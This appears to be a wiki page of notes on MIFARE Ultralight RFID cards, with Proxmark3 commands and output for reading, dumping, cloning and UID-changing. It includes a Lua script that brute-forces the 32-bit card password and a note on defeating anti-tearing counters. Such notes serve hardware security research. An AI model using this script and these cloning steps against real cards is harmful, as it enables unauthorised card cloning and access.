Skip to content

MIFARE Ultralight

MIFARE Ultralight

  • Operates at 13.56 MHz
  • Uses the ISO/IEC 14443-3 protocols
  • optional password but is transmitted in clear text

Documentation
Documentation

MIFARE Ultralight Gen1A

  • Password Authentication

Read a Ultralight:

[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight (MF0ICU1)
[+]        UID: 04 B7 66 DA A5 4F 80
[+]     UID[0]: 04, NXP Semiconductors Germany
[+]       BCC0: 5D ( ok )
[+]       BCC1: B0 ( ok )
[+]   Internal: 48 ( default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------

Dump Memory:

[usb] pm3 --> hf mfu dump
[+] TYPE: MIFARE Ultralight (MF0ICU1)
[+] Reading tag memory...

[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 00 00 00 00 00 00 00
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=]              00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=] Counter 0... 00 00 00
[=] Tearing 0... 00
[=] Counter 1... 00 00 00
[=] Tearing 1... 00
[=] Counter 2... 00 00 00
[=] Tearing 2... 00
[=] Max data page... 14 ( 60 bytes )
[=] Header size..... 56 bytes

[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]   0/0x00 | 04 47 0E C5 |   | .G..
[=]   1/0x01 | 0A F1 33 84 |   | ..3.
[=]   2/0x02 | 4C 48 F8 01 |   | LH..
[=]   3/0x03 | F4 1B 48 15 | 1 | ..H.
[=]   4/0x04 | 54 30 35 33 | 1 | T053
[=]   5/0x05 | 37 30 32 30 | 1 | 7020
[=]   6/0x06 | 33 39 32 30 | 1 | 3920
[=]   7/0x07 | 30 31 38 32 | 1 | 0182
[=]   8/0x08 | 32 38 31 39 | 1 | 2819
[=]   9/0x09 | FF FF FF FF | 0 | ....
[=]  10/0x0A | FF FF FF FF | 0 | ....
[=]  11/0x0B | FF FF FF FF | 0 | ....
[=]  12/0x0C | FF FF FF FF | 0 | ....
[=]  13/0x0D | FF FF FF FF | 0 | ....
[=]  14/0x0E | FF FF FF FF | 0 | ....
[=]  15/0x0F | FF FF FF FF | 0 | ....
[=] ---------------------------------
[=] Using UID as filename
[+] saved 120 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.json

Clone Card:

[usb] pm3 --> hf mfu restore -f hf-mfu-04470E0AF13384-dump-001.bin
[+] loaded 120 bytes from binary file `hf-mfu-04470E0AF13384-dump-001.bin`
[=] Restoring hf-mfu-04470E0AF13384-dump-001.bin to card

Brute force Script:

local getopt = require('getopt')
local utils = require('utils')

function file_exists(name)
   local f = io.open(name, "r")
   return f ~= nil and io.close(f)
end


local function convert_string_to_hex(str)
 return (
  str:gsub('.', function (c)
    return string.format('%02X', string.byte(c))
   end
  )
 )
end

-- Convert a string in to a hex string
local function convert_int_to_hex(int)
 return (
 	string.format("%x", int)
 )
end

local function main(args)
	start_id = 0x00000000
	end_id = 0xFFFFFFFF

	for option, argument in getopt.getopt(args, ':s:e') do
		-- start hex value
		if option == 's' then
			print('Start Key ' .. argument)
			start_id = tonumber(argument, 16)
		end
		-- end hex value
		if option == 'e' then
			end_id = tonumber(argument, 16)
		end
	end

	print('Starting bruteforce from key 0x' .. ('%08x'):format(start_id)  .. ' to dump the data')
	for i = start_id,end_id,1 do
		print('Trying key ' .. ('%08x'):format(i))
		--print('hf mfu dump -k ' .. ('%08x'):format(i) .. ' -f decrypted_' .. ('%08x'):format(i) .. '.bin')
		core.console('hf mfu dump -k ' .. ('%08x'):format(i) .. ' -f decrypted_' .. ('%08x'):format(i) .. '.bin')
		if file_exists('decrypted_' .. ('%08x'):format(i) .. '.bin') then
			print('Found key ' .. ('%08x'):format(i))
			return true
		end
	end
end

main(args)

MIFARE Ultralight DirectWrite

MIFARE Ultralight EV1 DirectWrite

MIFARE Ultralight EV1 Magic Card

Change UID:

[usb] pm3 --> hf mfu setuid -u 01020304050607
[=] Please ignore possible transient BCC warnings
[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) ( magic  )
[+]        UID: 01 02 03 04 05 06 07
[+]     UID[0]: 01, Motorola UK
[+]       BCC0: 88 ( ok )
[+]       BCC1: 00 ( ok )
[+]   Internal: 00 ( not default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000

MIFARE Ultralight EV1

Card Info:

[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+]        UID: 04 46 DF CA 5B 62 80
[+]     UID[0]: 04, NXP Semiconductors Germany
[+]       BCC0: 15 ( ok )
[+]       BCC1: 73 ( ok )
[+]   Internal: 48 ( default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000

[=] --- Tag Counters
[=]        [0]: 00 00 00
[+]             - BD tearing ( ok )
[=]        [1]: 00 00 00
[+]             - BD tearing ( ok )
[=]        [2]: 00 00 00
[+]             - BD tearing ( ok )

[=] --- Tag Silicon Information
[=]        Wafer Counter: 17582969 ( 0x10C4B79 )
[=]    Wafer Coordinates: x 70, y 223 (0x46, 0xDF)
[=]            Test Site: 2

[=] --- Tag Version
[=]        Raw bytes: 00 04 03 01 01 00 0B 03
[=]        Vendor ID: 04, NXP Semiconductors Germany
[=]     Product type: Ultralight
[=]  Product subtype: 01, 17 pF
[=]    Major version: 01
[=]    Minor version: 00
[=]             Size: 0B, (64 <-> 32 bytes)
[=]    Protocol type: 03, ISO14443-3 Compliant

[=] --- Tag Configuration
[=]   cfg0 [16/0x10]: 00 00 00 FF
[=]                     - strong modulation mode disabled
[=]                     - pages don't need authentication
[=]   cfg1 [17/0x11]: 00 05 00 00
[=]                     - Unlimited password attempts
[=]                     - NFC counter disabled
[=]                     - NFC counter not protected
[=]                     - user configuration writeable
[=]                     - write access is protected with password
[=]                     - 05, Virtual Card Type Identifier is default
[=]   PWD  [18/0x12]: 00 00 00 00 - (cannot be read)
[=]   PACK [19/0x13]: 00 00       - (cannot be read)
[=]   RFU  [19/0x13]:       00 00 - (cannot be read)

[+] --- Known EV1/NTAG passwords
[+] Found default password FF FF FF FF  pack 00 00
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------

Read Memory:

[usb] pm3 --> hf mfu dump -k "FFFFFFFF"
[+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+] Reading tag memory...

[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 04 03 01 01 00 0B 03
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 21 46 AA 5B B9 7E D9 BF E2 5B E2 9D 56 E0 AF C3
[=]              7F 43 DB 50 8B B2 3C 9E 69 70 21 EC A3 E9 56 B1
[=] Counter 0... 00 00 00
[=] Tearing 0... BD
[=] Counter 1... 00 00 00
[=] Tearing 1... BD
[=] Counter 2... 00 00 00
[=] Tearing 2... BD
[=] Max data page... 18 ( 76 bytes )
[=] Header size..... 56 bytes

[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]   0/0x00 | 04 46 DF 15 |   | .F..
[=]   1/0x01 | CA 5B 62 80 |   | .[b.
[=]   2/0x02 | 73 48 00 00 |   | sH..
[=]   3/0x03 | 00 00 00 00 | 0 | ....
[=]   4/0x04 | 00 00 00 00 | 0 | ....
[=]   5/0x05 | 00 00 00 00 | 0 | ....
[=]   6/0x06 | 00 00 00 00 | 0 | ....
[=]   7/0x07 | 00 00 00 00 | 0 | ....
[=]   8/0x08 | 00 00 00 00 | 0 | ....
[=]   9/0x09 | 00 00 00 00 | 0 | ....
[=]  10/0x0A | 00 00 00 00 | 0 | ....
[=]  11/0x0B | 00 00 00 00 | 0 | ....
[=]  12/0x0C | 00 00 00 00 | 0 | ....
[=]  13/0x0D | 00 00 00 00 | 0 | ....
[=]  14/0x0E | 00 00 00 00 | 0 | ....
[=]  15/0x0F | 00 00 00 00 | 0 | ....
[=]  16/0x10 | 00 00 00 FF | 0 | ....
[=]  17/0x11 | 00 05 00 00 | 0 | ....
[=]  18/0x12 | FF FF FF FF | 0 | ....
[=]  19/0x13 | 00 00 00 00 | 0 | ....
[=] ---------------------------------

Monotonic Counter Anti-Tearing Defeated

Anti-Tearing: Is a feature on RFIDs that only when the card has enough power to preform a write will it actually write to the card.

Note

If we can control the EEPROM power we can interrupt its erase and or write operations. This can be helpful if we cant write any value to the EEPROM already

Source

MIFARE Ultralight AES

MIFARE Ultralight Magic

Write Blocks:

[usb] pm3 --> hf mfu setuid --uid 01020304050607
[=] Please ignore possible transient BCC warnings
[usb] pm3 --> hf mfu info

[=] --- Tag Information --------------------------
[+]       TYPE: Unknown 000000
[+]        UID: 01 02 03 04 05 06 07
[+]     UID[0]: 01, Motorola UK
[+]       BCC0: 88 ( ok )
[+]       BCC1: 00 ( ok )
[+]   Internal: 00 ( not default )
[+]       Lock: 00 00  - 0000000000000000
[+] OneTimePad: 00 00 00 00  - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------